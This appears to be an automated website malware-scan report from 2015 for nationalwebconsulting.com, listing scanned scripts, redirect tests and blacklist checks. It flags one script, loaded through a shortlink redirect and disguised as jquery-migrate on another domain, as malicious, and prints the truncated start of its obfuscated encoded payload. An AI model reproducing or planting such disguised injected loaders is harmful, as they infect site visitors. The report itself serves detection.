Scanned pages/files
Request | Server response | Status |
http://nationalwebconsulting.com/ | 200 OK Content-Length: 65748 Content-Type: text/html | clean |
http://nationalwebconsulting.com/wp-includes/js/jquery/jquery.js?ver=1.11.2 | 200 OK Content-Length: 95952 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/ultimate-landing-page-and-coming-soon-page/template/template1Script.js?ver=4.2 | 200 OK Content-Length: 2129 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/print-o-matic/printomat.js?ver=1.6.0 | 200 OK Content-Length: 4718 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.3.3&ver=4.2 | 200 OK Content-Length: 85185 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.3.3&ver=4.2 | 200 OK Content-Length: 93561 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/nmedia-user-file-uploader/js/mask/jquery.maskedinput.min.js?ver=3.0 | 200 OK Content-Length: 3568 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/nmedia-user-file-uploader/js/plupload-2.1.2/js/plupload.full.min.js?ver=3.0 | 200 OK Content-Length: 108791 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 | 200 OK Content-Length: 12206 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/nmedia-user-file-uploader/js/script.js?ver=3.0 | 200 OK Content-Length: 9036 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/nmedia-user-file-uploader/js/jquery.flexslider-min.js?ver=3.0 | 200 OK Content-Length: 21545 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/nmedia-user-file-uploader/js/jquery.colorbox-min.js?ver=3.0 | 200 OK Content-Length: 11859 Content-Type: application/javascript | clean |
http://nationalwebconsulting.com/wp-content/plugins/nmedia-user-file-uploader/js/data-tables/jquery.dataTables.js?ver=3.0 | 200 OK Content-Length: 301833 Content-Type: application/javascript | clean |
http://goo.gl/P4YrUf | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Tue, 08 Sep 2015 07:02:51 GMT Pragma: no-cache Accept-Ranges: none Location: http://adahb.org/elements/include/jquery-migrate.min.g.js Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://adahb.org/elements/include/jquery-migrate.min.g.js | 200 OK Content-Length: 1921 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _2882;var _9638='2151C189C209F2653C2464A2617B1879B2671A2140B2491C2590E2482E2644B2572F2500B2581B2635D2005E2617B2500E2509E2500A2617D2617F2500D2617F2122D1681F2653C2464E2617C1879F2509E2140F2671A2005D2626C2500C2464E2617D2482B2527F1951E1897F2509A2464C2482B2500E2473E2590C2590D2554E1897F1960C2122B1879D1681C2653C2464F2617E1879F2518F2140A2671A2005E2626D2500B2464D2617C2482C2527F1951B1897D2518C2590F2590A2518F2563B2500B1897C1960A2122B1681B2653F2464E2617C1879C2572F2140D2671C2005E2626D2500C2464B2617B2482B2 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nationalwebconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Sep 2015 07:02:46 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Link: <http://nationalwebconsulting.com/>; rel=shortlink
X-Pingback: http://nationalwebconsulting.com/xmlrpc.php
GET / HTTP/1.1
Host: nationalwebconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Sep 2015 07:02:46 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Link: <http://nationalwebconsulting.com/>; rel=shortlink
X-Pingback: http://nationalwebconsulting.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: nationalwebconsulting.com
Referer: http://www.google.com/search?q=nationalwebconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nationalwebconsulting.com
Referer: http://www.google.com/search?q=nationalwebconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nationalwebconsulting.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nationalwebconsulting.com/
Result: nationalwebconsulting.com is not infected or malware details are not published yet.
Result: nationalwebconsulting.com is not infected or malware details are not published yet.